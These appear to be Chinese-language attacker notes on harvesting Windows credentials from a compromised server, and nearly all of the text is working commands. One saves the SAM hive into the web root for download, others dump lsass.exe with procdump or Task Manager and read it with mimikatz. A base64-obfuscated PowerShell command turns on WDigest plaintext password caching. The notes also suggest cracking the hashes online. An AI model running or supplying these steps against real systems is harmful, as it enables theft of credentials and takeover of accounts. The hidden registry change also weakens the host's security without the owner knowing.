本地读取管理员账号
读取本地管理员Hash
1. reg save hklm\sam C:\inetpub\wwwroot\sam.hiv
把文件下载到本地。与mimikatz工具放到一起。
开始跑命令
获取到administrator的Hash值。再去解密网站解密。
从内存中获取账号密码-使用procdump工具获取内存文件
先把工具上传到目标系统。
在执行命令。procdump.exe -accepteula -ma lsass.exe lsass.dmp
下载文件后跟mimikatz放到一起。需要用mimikatz查看
执行2条命令
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
已经获得用户名密码。
从任务管理器导出内存文件(需要登录到服务器上)
在进程中找到lsass.exe进程右键创建转存储文件。
把lsass文件放入mimikatz中输入命令查看。
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
如果不能读取内存中的密码。说明内存没开启密码记录。需要去修改注册表开启密码记录。在cmd中执行下面命令
Powershell -ENC dAByAHkAIAB7ACAATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgAEgASwBMAE0AOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAQwBvAG4AdAByAG8AbABcAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB2AGkAZABlAHIAcwBcAFcARABpAGcAZQBzAHQAIAAtAE4AYQBtAGUAIABVAHMAZQBMAG8AZwBvAG4AQwByAGUAZABlAG4AdABpAGEAbAAgAC0AVAB5AHAAZQAgAEQAVwBPAFIARAAgAC0AVgBhAGwAdQBlACAAMQAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwB0AG8AcAAgAH0AYwBhAHQAYwBoACAAewAgAH0A
等计算机重启后就可以读取密码了。
